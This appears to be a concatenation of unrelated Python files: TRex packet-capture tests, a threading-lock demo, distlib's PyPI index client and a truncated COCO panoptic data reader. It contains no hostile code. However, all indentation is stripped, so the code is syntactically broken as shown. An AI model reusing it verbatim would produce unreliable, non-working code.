assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = self.rx_port, enabled = False)
# in this test we capture and analyze the ARP request / response
def test_arp_capture (self):
if self.c.get_port_attr(self.tx_port)['layer_mode'] != 'IPv4':
return self.skip('skipping ARP capture test for non-ipv4 config on port {0}'.format(self.tx_port))
if self.c.get_port_attr(self.rx_port)['layer_mode'] != 'IPv4':
return self.skip('skipping ARP capture test for non-ipv4 config on port {0}'.format(self.rx_port))
try:
# move to service mode
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
bpf = self.correct_bpf('arp')
# start a capture
cap_info = self.c.start_capture(rx_ports = [self.tx_port, self.rx_port], limit = 2, bpf_filter = bpf)
# generate an ARP request
self.c.arp(ports = self.tx_port)
pkts = []
self.c.stop_capture(cap_info['id'], output = pkts)
assert len(pkts) == 2
# find the correct order
if pkts[0]['port'] == self.rx_port:
request = pkts[0]
response = pkts[1]
else:
request = pkts[1]
response = pkts[0]
assert request['port'] == self.rx_port
assert response['port'] == self.tx_port
arp_request, arp_response = Ether(request['binary']), Ether(response['binary'])
assert 'ARP' in arp_request
assert 'ARP' in arp_response
assert arp_request['ARP'].op == 1
assert arp_response['ARP'].op == 2
assert arp_request['ARP'].pdst == arp_response['ARP'].psrc
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = [self.tx_port, self.rx_port], enabled = False)
# test PING
def test_ping_capture (self):
if self.c.get_port_attr(self.tx_port)['layer_mode'] != 'IPv4':
return self.skip('skipping ping capture test for non-ipv4 config on port {0}'.format(self.tx_port))
if self.c.get_port_attr(self.rx_port)['layer_mode'] != 'IPv4':
return self.skip('skipping ping capture test for non-ipv4 config on port {0}'.format(self.rx_port))
try:
# move to service mode
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# start a capture
bpf = self.correct_bpf('ip and icmp')
cap_info = self.c.start_capture(rx_ports = [self.tx_port, self.rx_port], limit = 100, bpf_filter = bpf)
# send ICMP echo requests (ping)
tx_ipv4 = self.c.get_port_attr(port = self.tx_port)['src_ipv4']
rx_ipv4 = self.c.get_port_attr(port = self.rx_port)['src_ipv4']
count = 50
self.c.ping_ip(src_port = self.tx_port, dst_ip = rx_ipv4, pkt_size = 1500, count = count, interval_sec = 0.01)
pkts = []
self.c.stop_capture(cap_info['id'], output = pkts)
req_pkts = [Ether(pkt['binary']) for pkt in pkts if pkt['port'] == self.rx_port]
res_pkts = [Ether(pkt['binary']) for pkt in pkts if pkt['port'] == self.tx_port]
assert len(req_pkts) == count
assert len(res_pkts) == count
for req_pkt in req_pkts:
assert 'ICMP' in req_pkt, req_pkt.command()
assert req_pkt['IP'].src == tx_ipv4
assert req_pkt['IP'].dst == rx_ipv4
assert req_pkt['ICMP'].type == 8
assert len(req_pkt) == 1500
for res_pkt in res_pkts:
assert 'ICMP' in res_pkt, res_pkt.command()
assert res_pkt['IP'].src == rx_ipv4
assert res_pkt['IP'].dst == tx_ipv4
assert res_pkt['ICMP'].type == 0
assert len(res_pkt) == 1500
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = [self.tx_port, self.rx_port], enabled = False)
# in this test we stress TX & RX captures in parallel
def test_stress_tx_rx (self):
pkt_count = 100
try:
# move to service mode
self.c.set_service_mode(ports = [self.rx_port, self.tx_port])
# start heavy traffic
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example')
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXCont(percentage = self.percentage)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, mult = "50%", force = True)
# start a capture on the RX port
capture_rx = self.c.start_capture(rx_ports = self.rx_port, limit = 1000)
# now under traffic start/stop the TX capture
for i in range(0, 1000):
# start a common capture
capture_txrx = self.c.start_capture(rx_ports = self.rx_port, tx_ports = self.tx_port, limit = 1000)
self.c.stop_capture(capture_txrx['id'])
except STLError as e:
assert False , '{0}'.format(e)
finally:
self.c.remove_all_captures()
self.c.set_service_mode(ports = [self.rx_port, self.tx_port], enabled = False)
@staticmethod
def _poll_tcp_port(shared):
for i in range(20):
if shared['tcp_port']:
break
time.sleep(0.1)
assert shared['tcp_port']
return shared['tcp_port']
def _conf_zmq_socket (self,zmq_socket):
zmq_socket.setsockopt(zmq.RCVTIMEO, 1000)
zmq_socket.setsockopt(zmq.SNDTIMEO, 1000)
tcp_port = zmq_socket.bind_to_random_port('tcp://*')
return tcp_port
## disabled due to https://github.com/cisco-system-traffic-generator/trex-core/issues/715
def _test_tx_from_capture_port (self):
'''
test TX packets from the RX core using capture port mechanism.
'''
rx_capture_id = None
# use explicit values for easy comparison
tx_src_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['src']
tx_dst_mac = self.c.ports[self.tx_port].get_layer_cfg()['ether']['dst']
self.c.set_service_mode(ports = [self.tx_port, self.rx_port])
# Add ZeroMQ Socket
zmq_context = zmq.Context()
zmq_socket = zmq_context.socket(zmq.PAIR)
try:
tcp_port = self._conf_zmq_socket(zmq_socket)
max_capture_packet = 2000
bpf = self.correct_bpf('udp')
rx_capture_id = self.c.start_capture(rx_ports = self.rx_port, limit = max_capture_packet, bpf_filter = bpf)['id']
self.c.start_capture_port(port = self.tx_port, endpoint = 'tcp://%s:%s' % (self.hostname, tcp_port))
self.c.clear_stats()
nb_packets = 20000
assert max_capture_packet <= nb_packets
pkt = bytes(Ether(src=tx_src_mac,dst=tx_dst_mac)/IP()/UDP(sport = 100,dport=1000)/('x' * 100))
for _ in range(1,nb_packets):
zmq_socket.send(pkt)
stats = self.stl_trex.get_stats()
# check capture status with timeout
timeout = PassiveTimer(2)
while not timeout.has_expired():
caps = self.c.get_capture_status()
assert(len(caps) == 1)
if caps[rx_capture_id]['count'] == max_capture_packet:
break
time.sleep(0.1)
assert abs(max_capture_packet-caps[rx_capture_id]['count']) / max_capture_packet < 0.05
# RX capture
rx_pkts = []
self.c.stop_capture(rx_capture_id, output = rx_pkts)
rx_capture_id = None
rx_pkts = [x['binary'] for x in rx_pkts]
# RX pkts are not byte-identical to TX - loose check: (nearly) all arrived and all are UDP
assert abs(max_capture_packet-len(rx_pkts)) / max_capture_packet < 0.05
assert (all(['UDP' in Ether(x) for x in rx_pkts]))
# Report the number of pps we were able to send
print('Done, %6s TX pps' % (round(stats[self.rx_port]['rx_pps'],2)))
finally:
self.c.remove_all_captures()
self.c.stop_capture_port(port = self.tx_port)
self.c.set_service_mode(ports = [self.rx_port, self.tx_port], enabled = False)
zmq_context.destroy()
## disabled due to https://github.com/cisco-system-traffic-generator/trex-core/issues/715
def _test_rx_from_capture_port_with_filter(self):
'''
test RX packets from the RX core using capture port mechanism
and BPF filter on the port
'''
pkt_count = 10
try:
# move to service mode
self.c.set_service_mode(ports = self.rx_port)
# Start a thread to receive and count how many packet we receive
shared = {'tcp_port': 0, 'stop': False, 'failed': False}
def run():
# Add ZeroMQ Socket for RX Port
zmq_context = zmq.Context()
zmq_socket = zmq_context.socket(zmq.PAIR)
shared['tcp_port'] = self._conf_zmq_socket(zmq_socket)
nb_received = 0
first_packet = 0
try:
while not shared['stop']:
try:
pkt = zmq_socket.recv()
if not first_packet:
first_packet = time.time()
scapy_pkt = Ether(pkt)
assert(scapy_pkt['UDP'].dport == 1222)
nb_received += 1
if nb_received == pkt_count:
delta = time.time() - first_packet
print('Done (%ss), %6s RX pps' % (round(delta,2), round(nb_received/delta,2)))
return
except zmq.Again:
pass
finally:
time.sleep(0.01)
raise Exception('Did not get needed packets')
except Exception as e:
print('Expected packets: %s, received: %s' % (pkt_count, nb_received))
shared['failed'] = True
print('Error: %s' % e)
finally:
zmq_context.destroy()
t = threading.Thread(name="capture_port_thread", target=run)
t.daemon=True
t.start()
tcp_port = self._poll_tcp_port(shared)
# Start with wrong filter
self.c.start_capture_port(port = self.rx_port, endpoint = 'tcp://%s:%s' % (self.hostname, tcp_port), bpf_filter="ip host 18.0.0.1")
# should not let start if started
with assert_raises(TRexError):
self.c.start_capture_port(port = self.rx_port, endpoint = 'tcp://%s:%s' % (self.hostname, tcp_port))
# should not let disable service mode
with assert_raises(TRexError):
self.c.set_service_mode(ports = self.rx_port, enabled = False)
# Then change it
bpf = self.correct_bpf('udp port 1222')
self.c.set_capture_port_bpf_filter(port = self.rx_port, bpf_filter = bpf)
# start heavy traffic with wrong IP first
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=1222,sport=1025)/'a_payload_example')
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXSingleBurst(pps = 10, total_pkts=pkt_count)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
# then start traffic with correct IP
pkt = STLPktBuilder(pkt = Ether()/IP(src="18.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/'a_payload_example')
stream = STLStream(name = 'burst2',
packet = pkt,
mode = STLTXSingleBurst(pps = 10, total_pkts=pkt_count)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, force = True)
# Wait until we have received everything
t.join(timeout=10)
if t.is_alive():
shared['stop'] = True
t.join(timeout=5)
raise Exception('Thread did not stop')
else:
assert not shared['failed']
finally:
self.c.remove_all_captures()
self.c.stop_capture_port(port = self.rx_port)
# should allow stop stopped
self.c.stop_capture_port(port = self.rx_port)
self.c.set_service_mode(ports = [self.rx_port], enabled = False)
self.c.stop()
## disabled due to https://github.com/cisco-system-traffic-generator/trex-core/issues/715
@nottest
def _test_capture_port_stress (self):
'''
test RX & Tx packets from the RX core using capture port mechanism
while start & stopping the capture port
'''
try:
# move to service mode
self.c.set_service_mode(ports = self.rx_port)
shared = {'tcp_port': 0, 'stop': False, 'failed': False}
# Start a thread to receive and send packets
def run_rx_tx():
# Add ZeroMQ Socket for RX Port
zmq_context = zmq.Context()
zmq_socket = zmq_context.socket(zmq.PAIR)
try:
shared['tcp_port'] = self._conf_zmq_socket(zmq_socket)
while not shared['stop']:
try:
pkt = zmq_socket.recv()
# Send it back
zmq_socket.send(pkt)
except zmq.Again:
pass
finally:
time.sleep(0.1)
finally:
zmq_context.destroy()
t = threading.Thread(name="capture_port_thread_rx", target=run_rx_tx)
t.daemon=True
t.start()
tcp_port = self._poll_tcp_port(shared)
# start heavy traffic
pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/'a_payload_example')
stream = STLStream(name = 'burst',
packet = pkt,
mode = STLTXCont(pps = 100000)
)
self.c.add_streams(ports = self.tx_port, streams = [stream])
self.c.start(ports = self.tx_port, force = True)
# Now start & stop the capture port while doing the work
for _ in range(5):
self.c.start_capture_port(port = self.rx_port, endpoint = 'tcp://%s:%s' % (self.hostname, tcp_port))
time.sleep(0.2)
self.c.stop_capture_port(port = self.rx_port)
time.sleep(0.2)
# Wait until thread dies
shared['stop'] = True
t.join(timeout=10)
assert not t.is_alive()
finally:
self.c.remove_all_captures()
self.c.stop()
self.c.set_service_mode(ports = [self.rx_port], enabled = False)
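# ---------------------------------------------------------------------------
# Minimal capture workflow sketch (added for illustration; it mirrors the steps
# the tests above exercise - server address, port numbers and limits are
# placeholder values):
#
#     c = STLClient(server='127.0.0.1')
#     c.connect()
#     c.reset(ports=[0, 1])
#     c.set_service_mode(ports=[1])                     # captures require service mode
#     cap = c.start_capture(rx_ports=[1], limit=100, bpf_filter='ip and udp')
#     ...                                               # generate traffic towards port 1
#     pkts = []
#     c.stop_capture(cap['id'], output=pkts)            # fetch the captured packets
#     c.remove_all_captures()
#     c.set_service_mode(ports=[1], enabled=False)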
|
thread-lock.py
|
###
# Thread lock test.
#
# License - MIT.
###
import os
import threading
# Global var value.
tmp_value = 0
# change_value - Change global value.
def change_value(id):
# {
global tmp_value
tmp_value += id
print('id: %d, Value: %d' % (id, tmp_value))
# }
# thread_function - Thread test function.
def thread_function(lock, id):
# {
with lock:
for i in range(10):
change_value(id)
# }
# Main function.
def main():
# {
# Create thread lock.
lock = threading.Lock()
thrd1 = threading.Thread(target = thread_function, args = (lock, 1))
thrd2 = threading.Thread(target = thread_function, args = (lock, 2))
thrd1.start()
thrd2.start()
thrd1.join()
thrd2.join()
print('The end, tmp_value: %d.' % tmp_value)
# }
# Program entry.
if '__main__' == __name__:
main()
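# Note (added): because each thread holds the lock for its entire loop, the two
# batches of ten increments cannot interleave, and the final value is always
# 1*10 + 2*10 = 30. The 'with lock:' block above is equivalent to the explicit
# form:
#
#     lock.acquire()
#     try:
#         for i in range(10):
#             change_value(id)
#     finally:
#         lock.release()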
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username', )
self.password = cfg.get('password', )
self.realm = cfg.get('realm', )
self.url = cfg.get('repository', )
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of output from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically be a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process, passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
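# Usage sketch (added for illustration): sign_file() and verify_signature() below
# build on run_command(); called directly it looks like this (assuming gpg was
# detected at construction time):
#
#     index = PackageIndex()
#     rc, out, err = index.run_command([index.gpg, '--version'])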
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
        This is a convenience method for downloading a file from a URL.
        Normally, this will be a file from the index, though currently
        no check is made for this (i.e. a file can be downloaded from
        anywhere).
        The method is just like the :func:`urlretrieve` function in the
        standard library, except that it allows digest computation to be
        done during download and checking that the downloaded data
        matches any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
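        # Each (field, value) pair and each file below becomes one "--boundary" part consisting of a
        # Content-Disposition header, an empty line and the value; the body is closed with "--boundary--".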
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
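# ---------------------------------------------------------------------------
# Illustrative sketch only (not part of distlib): a minimal example of how the
# download/verify helpers above might be used. It assumes the enclosing class is
# distlib's PackageIndex; the URL, file names and MD5 value are placeholders.
def _example_download_and_verify():
    index = PackageIndex()  # hypothetical use of the class defined above
    # download with an on-the-fly digest check, passed as a (hasher, expected_value) tuple
    index.download_file('https://example.com/pkg-1.0.tar.gz', 'pkg-1.0.tar.gz',
                        digest=('md5', 'd41d8cd98f00b204e9800998ecf8427e'))
    # verify a detached GPG signature against the downloaded file (requires a gpg binary)
    return index.verify_signature('pkg-1.0.tar.gz.asc', 'pkg-1.0.tar.gz')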
|
CocoPanoptic_Reader.py
|
# Reader for the COCO panoptic dataset for pointer-based image segmentation
import numpy as np
import os
import scipy.misc as misc
import random
import cv2
import json
import threading
############################################################################################################
def rgb2id(color):  # Convert annotation map from 3-channel RGB encoding to instance id
if isinstance(color, np.ndarray) and len(color.shape) == 3:
if color.dtype == np.uint8:
color = color.astype(np.uint32)
return color[:, :, 0] + 256 * color[:, :, 1] + 256 * 256 * color[:, :, 2]
return color[0] + 256 * color[1] + 256 * 256 * color[2]
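# Illustrative sketch only (not part of the original reader): a small, hypothetical example of
# what rgb2id computes, both for a single [R, G, B] triplet and for a full H x W x 3 annotation map.
def _rgb2id_example():
    single_id = rgb2id([12, 1, 0])  # 12 + 256*1 + 256*256*0 = 268
    ann_map = np.zeros((4, 4, 3), dtype=np.uint8)
    ann_map[..., 0] = 12
    ann_map[..., 1] = 1
    id_map = rgb2id(ann_map)  # 4x4 array filled with the id 268
    return single_id, id_map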
#########################################################################################################################
#########################################################################################################################
class Reader:
# Initiate reader and define the main parameters for the data reader
def __init__(self, ImageDir="/media/sagi/9be0bc81-09a7-43be-856a-45a5ab241d90/Data_zoo/COCO/train2017",AnnotationDir="/media/sagi/9be0bc81-09a7-43be-856a-45a5ab241d90/Data_zoo/COCO/COCO_panoptic/panoptic_train2017/panoptic_train2017", DataFile="/media/sagi/9be0bc81-09a7-43be-856a-45a5ab241d90/Data_zoo/COCO/COCO_panoptic/panoptic_train2017.json",MaxBatchSize=100,MinSize=250,MaxSize=800,MaxPixels=800*800*5, AnnotationFileType="png", ImageFileType="jpg",UnlabeledTag=0,Suffle=True,TrainingMode=True):
self.ImageDir=ImageDir # Image dir
self.AnnotationDir=AnnotationDir # File containing image annotation
self.MaxBatchSize=MaxBatchSize # Max number of image in batch
        self.MinSize=MinSize # Min image width and height in pixels
        self.MaxSize=MaxSize #Max image width and height in pixels
        self.MaxPixels=MaxPixels # Max number of pixels in the whole batch (reduce to solve out of memory (OOM) issues)
        self.AnnotationFileType=AnnotationFileType # What is the type (extension) of the annotation files
        self.ImageFileType=ImageFileType # What is the type (extension) of the image files
        self.DataFile=DataFile # Json file that contains data on the annotation of each image
        self.UnlabeledTag=UnlabeledTag # Value of unlabeled regions in the annotation map (usually 0)
        self.ReadStuff = True # Read things that are not instance objects (like sky or grass)
        self.SplitThings = False#True # Split instances of things (objects) into connected component regions and use each connected region as an instance
        self.SplitStuff = True # Split instances of stuff into connected component regions and use each connected region as an instance
        self.SplitCrowd = True # Split areas marked as crowds using connected components
        self.IgnoreCrowds = True # Ignore areas marked as crowd
        self.PickBySize = True # Pick instances with probability proportional to their sizes
        self.StuffAreaFactor=0.225 # Since segments are picked according to their size, stuff segments (ground, sky) would have a higher probability of being chosen compared to things (objects); this factor balances this
        self.MinSegSize=100 # Ignore segments which are smaller than this size in pixels
        self.Epoch = 0 # Training Epoch
        self.itr = 0 # Training iteration
        self.suffle=Suffle # Shuffle list of files
#........................Read data file................................................................................................................
with open(DataFile) as json_file:
self.AnnData=json.load(json_file)
#-------------------Get All files in folder--------------------------------------------------------------------------------------
self.FileList=[]
for FileName in os.listdir(AnnotationDir):
if AnnotationFileType in FileName:
self.FileList.append(FileName)
if self.suffle:
random.shuffle(self.FileList)
if TrainingMode: self.StartLoadBatch()
##############################################################################################################################################
    # Get annotation data for a specific image from the json file
def GetAnnnotationData(self, AnnFileName):
for item in self.AnnData['annotations']: # Get Annotation Data
if (item["file_name"] == AnnFileName):
return(item['segments_info'])
############################################################################################################################################
    # Get information for a specific category/class id
def GetCategoryData(self,ID):
for item in self.AnnData['categories']:
if item["id"]==ID:
return item["name"],item["isthing"]
    ##########################################################################################################################################
    # Split a binary mask corresponding to a single segment into connected components
